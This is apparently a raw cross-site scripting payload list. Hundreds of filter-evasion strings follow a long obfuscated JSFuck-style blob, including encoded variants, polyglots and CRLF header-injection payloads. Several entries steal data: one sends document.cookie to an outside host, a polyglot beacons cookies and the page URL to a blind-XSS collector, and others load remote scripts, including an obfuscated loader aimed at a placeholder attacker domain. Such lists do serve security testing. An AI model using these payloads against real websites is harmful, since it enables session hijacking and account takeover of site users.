B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<<SCRIPT>alert("XSS");//\<</SCRIPT>
<IMG SRC="`<javascript:alert>`('XSS')"
</script><script>alert('XSS');</script>
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<svg/onload=alert('XSS')>
&quot;&gt;&lt;svg onload=alert&amp;amp;#x00000040&quot;1&quot;&gt;
&lt;svg onload=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(1)&gt;
&lt;svg/onload=&#39;alert&amp;#40 23 &amp;#41;&#39;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x2F;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;amp;#x27;&#x00000040&quot;1&quot;&gt;
&rdquo;&gt;&lt;svg onload=alert&amp;#000000040&quot;1&quot;&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;
&quot;&gt;&lt;SVG ONLOAD=&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116(&amp;#x64&amp;#x6f&amp;#x63&amp;#x75&amp;#x6d&amp;#x65&amp;#x6e&amp;#x74&amp;#x2e&amp;#x64&amp;#x6f&amp;#x6d&amp;#x61&amp;#x69&amp;#x6e)&gt;
&quot;&gt;&lt;svg onload=alert&amp;#x27;&#x00000040&quot;1&quot;&gt;
PHN2ZyBvbmxvYWQ9YWxlcnQmYWxlcnQoMjMgKT4=
PHN2Zy9vbmxvYWQ9J2FsZXJ0Jz4=
%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E
%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E
%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E
<BGSOUND SRC="javascript:alert('XSS');">
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[ al+/e/['ex + ec]'e'+'rt'](2)">
<svg/&parameter=onload=alert()>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
>><marquee loop=1 width=0 onfinish=alert(1)>
<a href=&#01javascript:alert(1)>
<a href=javascript&colon;confirm(1)>
<a href="jav%0Dascript&colon;alert(1)">
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>
%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
<%tag onmouseover="alert('markitzeroday.com')">
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
%uff3c%uff73%uff6cr%uff69%uff63%uff74%uffe0alert('XSS')%uff3e
%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003ealert('XSS')%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uff3ealert('XSS')%uff3c%uff2f%uff73%uff63%uff72%uff69%uff70%uff74%uff3e
%uff3cscript%uff3ealert('XSS')%uff3c/script%uff3e
%3Cscript%3Ealert('XSS')%3C/script%3E
%u003Cscript%u003Ealert('XSS')%u003C/script%u003E
%253Cscript%253Ealert('XSS')%253C/script%253E
%uff3c%uff73%uff63%uff72%uff69%uff70%uff74%uffe0alert('XSS')%uff3e
%u0025u0073u0063u0072u0069u0070u0074u003Ealert('XSS')%u003C%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003E
&lt;script&gt;alert('XSS')&lt;/script&gt;
%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
<IMG SRC=# onmouseover="alert('xxs')">
%3B%C3%81=![]%3B%C3%89=!![]%3B%C3%8D=[][[]]%3B%C3%93=%2B[![]]%3BSI=%2B(%2B!%2B[]%2B(!%2B[]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B[%2B!%2B[]]%2B[%2B[]]%2B[%2B[]]%2B[%2B[]])%3BST=([]%2B[])%3B%C3%9C=(%2B[])%3BA=(%C3%81%2B%22%22)[1]%3BD%20=%20(%C3%8D%2B%22%22)[2]%3BE%20=%20(%C3%89%2B%22%22)[3]%3BF%20=%20(%C3%81%2B%22%22)[0]%3BG%20=%20[![]%2B[%2B[]]%2B[[]%2B[]][%2B[]][[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B!%2B[]]%2B[![]%2B[]][%2B[]][!%2B[]%2B!%2B[]%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]%2B[[][[]]%2B[]][%2B[]][%2B[]]%2B[![]%2B%7B%7D][%2B[]][%2B!%2B[]%2B[%2B[]]]%2B[!![]%2B[]][%2B[]][%2B[]]%2B[[]%2B%7B%7D][%2B[]][%2B!%2B[]]%2B[!![]%2B[]][%2B[]][%2B!%2B[]]]][%2B[]][!%2B[]%2B!%2B[]%2B[%2B[]]]%3BI%20=%20([%C3%81]%2B%C3%8D)[10]%3BL%20=%20(%C3%81%2B%22%22)[2]%3BT%20=%20(%C3%89%2B%22%22)[0]%3BO%20=%20(%C3%89%2B[][F%2BI%2BL%2BL])[10]%3BR%20=%20(%C3%89%2B%22%22)[1]%3BN%20=%20(%C3%8D%2B%22%22)[1]%3BM%20=%20(%2B(208))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BP%20=%20(%2B(211))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](31)[1]%3BS%20=%20(%C3%81%2B%22%22)[3]%3BU%20=%20(%C3%8D%2B%22%22)[0]%3BV%20=%20(%2B(31))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](32)%3BX%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](34)[1]%3BY%20=%20(%C3%93%2B[SI])[10]%3BZ%20=%20(%2B(35))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](36)%3BC%20=%20([][F%2BI%2BL%2BL]%2B%22%22)[3]%3BH%20=%20(%2B(101))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)[1]%3BK%20=%20(%2B(20))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](21)%3BW%20=%20(%2B(32))[T%2BO%2B%22S%22%2BT%2BR%2BI%2BN%2BG](33)%3BJ%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[3]%3BB%20=%20([][E%2BN%2BT%2BR%2BI%2BE%2BS]()%2B%22%22)[2]%3BDOT%20=%20(%2B(%2211E100%22)%2B[])[1]%3BSLA=(![]%2B[%2B![]])[([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(!![]%2B[])[%2B[]]%2B(![]%2B[])[%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B([][(![]%2B[])[%2B[]]%2B([![]]%2B[][[]])[%2B!%2B[]%2B[%2B[]]]%2B(![]%2B[])[!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B[]]%2B(!![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(!![]%2B[])[%2B!%2B[]]]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]%2B(![]%2B[])[!%2B[]%2B!%2B[]%2B!%2B[]]]()[%2B!%2B[]%2B[%2B[]]]%3B[][F%2BI%2BL%2BL][C%2BO%2BN%2BS%2BT%2BR%2BU%2BC%2BT%2BO%2BR](S%2BE%2BT%2B%22T%22%2BI%2BM%2BE%2BO%2BU%2BT%2B%22(%22%2BF%2BU%2BN%2BC%2BT%2BI%2BO%2BN%2B%22()%7B%20$%22%2BDOT%2BG%2BE%2BT%2B%22S%22%2BC%2BR%2BI%2BP%2BT%2B%22('%22%2BSLA%2BSLA%2B%22BADASSDOMAIN%22%2BDOT%2B%22COM%22%2BSLA%2B%22BADASSURL')()%3B%20%7D,%203000)%3B%22)()%3B(%22
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
><img/onerror="javascript:alert(1%26%23x000000029;" src=x>
"><iframe/src="javascript:alert(1%26%23x00000000000000000000000000029;"></iframe>
window['alXert'.replace(/X/, '')](self['document']['cookie'])
#prettyPhoto%3Cimg%20src=x%20onerror=prompt(document.cookie)%3E;//
?&q&zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
zzz%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//
<img/src=a onerror="window['alert'](document.cookie)"/>
<script src=//0-a.nl/conf.js></script>
<iframe src="javascript:alert('XSS')"></iframe>
<input type="text" value="javascript:alert('XSS')">
<form action="javascript:alert('XSS')">
"><script>alert(1)</script><"
javascript:/*'-alert(1)-'*/
javascript:document.body.onclick=alert(1)
123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
javascript:var img=document.createElement('img');img.src='';document.body.appendChild(img);img.onerror=alert(1)
javascript:var a=document.createElement('a');a.href='javascript:alert(1)';document.body.appendChild(a)
<script>alert('\u0031')</script>
&#x3C;script&#x3E;alert(1)&#x3C;&#x2F;script&#x3E;
" onfocus="alert(1)" autofocus="
<audio src="nonexistent.mp3" onerror="alert(1)"></audio>
?query=<img/src/onerror=alert(`ibro`)>
?query="><img src=x onerror=prompt(document.domain);>
en-us/Search#/?search="><img src=x onerror=prompt(document.domain);>
search?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q=<img/src/onerror=alert(`ibro`)>
Search/Results?q="><img src=x onerror=prompt(document.domain);>
redirect?url=javascript://%250Aalert(document.domain)
redirect.asp?url=javascript://%250Aalert(document.domain)
redirect.aspx?url=javascript://%250Aalert(document.domain)
q=javascript:alert(document.domain)
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
(A("onerror='alert`1`'testabcd))/
onerror="alert('XSS')"
pods/ppt.aspx?&fileName=')}, 1000); alert('xss')://
')}, 1000); alert('xss')://
<!--xss"><img src=x onerror=prompt(document.domain)>-->
%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E
'; x=eval; </script> <svg onpointerenter=alert()%20z= alert >
mrco24"type=image src onerror="alert(1)"
"><script akdk> prompt(document.domain)</script akdk>
foo?q=foo<script>alert('xss')<%2fscript>
Login.aspx?username=<img/src/onerror=alert(ibro)>
<details open ontoggle="alert(1)"><summary>Click me!</summary></details>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src="javascript:alert('XSS')" alt="Image">
<Img Src=OnXSS OnError=confirm(document.cookie)>
tagName%2BinnerHTML%2Blocation.hash%3E/*click%20me!#*/alert(document.domain)
xxxxxxxxx'});});</script><script>prompt("PLEASE%20\nSUBSCRIBE")</script>
xxxxxxxxx'});}); </script><script>prompt ("PLEASE%20\nSUBSCRIBE") </script>
<img src=x onerror=print()>
javascript://'/</title></style></textarea></script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
javascript://%2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E--%3E%3Cp%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B%27%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
javascript://%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E--%3E%3Cp%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+'Audi%20RS5'.substr(0,4)}}XXX%3Cscript%3Ealert('XSS')
#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
`javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>/alert()/
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'
#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*/*/**/**/**/*%0D%0A%0d%0a*//**/oNclick-alert())//</style/</title/</textarEa/</script/->\x3ciframe/<iframe/oNloAd-alert(1)//>\x3e
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*<img src=x onerror=alert(456)/><svg/onload=prompt(789)/>;'"// :;fn();%0a%0d\n\r\t{{12*12+'Audi RS5'.substr(0,4)}}XXX<script>alert('XSS')<img src=x onerror='(function s(){var i=new Image();i.src='http://bl4de.tech/bxss.php?c='+document.cookie+';'+encodeURIComponent(location.href);document.body.append(i)})()'/>#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
"onmouseover="alert(1)
"onmouseover=alert(1)
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
%E5%98%8D%E5%98%8ASet-Cookie%3A%20whoami%3Dthecyberneh%25u2028%25u2029XSS-Payload%3A%2520%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE%0D%0A%0D%0A<script>%0D%0Aalert(1);%0D%0A</script>
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--
%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
<a"/onclick=(confirm)()>elcezeri!
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
<svg onload=alert(document.domain)>
xss"><!--><svg/onload=alert(document.domain)>
"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
%3Cimg src='null' onerror=alert('spyerror')%3E
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<object/data="javascript&colon;alert/**/(document.domain)">//
<iframe src="javasc%0a%0dript:alert(0);">
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E
&quot;&gt;&lt;img src=x onerror=prompt(&quot;XSS&quot;)&gt;
"\">" + "<img src=x onerror=prompt('XSS')>" + "\""
"><img&#x20;src=x&#x20;onerror=prompt('XSS')>"
"><body/onload="{x:onerror=alert};x"
%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e
"><img src=x onerrora=confirm() onerror=confirm(1)>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
#"onmouseover="alert(1)
#javascript:alert(1)
javascript:alert(1)
"'><img src=q onerror=alert(1)>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
'-setTimeout`prompt\u0028document.domain\u0029`-'
}}}</script><script>alert(1)</script>
alert?.(document?.cookie)
<--`<img/src=`%20onerror=confirm``>%20--!>
{{&lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }}
javascript:alert(1)?q=%26callback%3Durc_button.click%23
#&quot;-alert(1)}//
test+(<script>alert(0)</script>)@gmail.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
#&#39;-alert(1)-&#39;
&#39;-alert(1)-&#39;
themecolor=%22-alert('XSS')-%22
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>'
<details open id="' &quot;'"ontoggle=alert(1)>
%22-alert('XSS')-%22
#&lt;img&#47;src&#47;onerror=alert(`ibro`)&gt;
#&lt;script&gt;prompt(document.domain)&lt;&#47;script&gt;
JavaScript://%250Dtop.confirm?.(1)//
#"><img src=x onerror=prompt(document.domain);>
1')"<!--><Svg OnLoad=(confirm)(1)<!--
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=
<script>prompt(document.domain)</script>
#<script>prompt(document.domain)</script>
-->""/></script><deTailS open x=">" ontoggle=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
<script x>alert('XSS')<script y>
<script>onerror=alert;throw 1337</script>
<object onafterscriptexecute=confirm(0)>
xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
<img/src='1'/onerror=alert(0)>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<svg onload = alert(1) >
"><svg/onload=confirm(1)>"@x.y
<img/src/onerror=alert(`ibro`)>
<svg onload=alert%26%230000000040"")>
#<img/src/onerror=alert(`ibro`)>
'-alert(1)-'
#'-alert(1)-'
#\"-alert(1)}//
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
>"'><script>alert(2);</script>
>'"><script>alert(2);</script>
+alert(1)+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
>'><script>alert(2);</script>
>'"><img src=x onerror=script(2);>
& lt;script&gt;alert(2);& lt;/script&gt;
& apos;><script>alert(2);</script>
!');script(2);//
$("script(2)")
[[constructor.constructor('alert(document.cookie)')()]]
['script'](2)
123')});alert(1);(()=>{('
&#x27;&lt;script&gt;alert(1)&lt;/script&gt;&#x27;
&#x27;javascript:alert(2)&#x27;
#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;
&#x27;&quot;&lt;img src=1 onerror=alert(1)&gt;&quot;&#x27;
&#x27;&quot;&gt;&lt;img src=x onerror=prompt(document['domain']);&gt;&#x27;
" /> <script>alert('XSS Testing");</script>
');alert(1)//
<math><x xlink:href=javascript:confirm`1`>click
" accesskey='x' onclick='confirm`1`' //
<x/oncopy=alert()>x
a=8,b=confirm,c=window,c.onerror=b;throw-a
<?tag x="-->" test="<img src=x onerror=alert(1)//">
<java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)
new Function`a\l\ert\`1\``
url=%26%2302java%26%23115cript:alert(document.domain)
?url=%26%2302java%26%23115cript:alert(document.domain)
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
</script><script>confirm(document.cookie)</script>
<sCriPt>confirm(documen.cookie)</ScRipt>
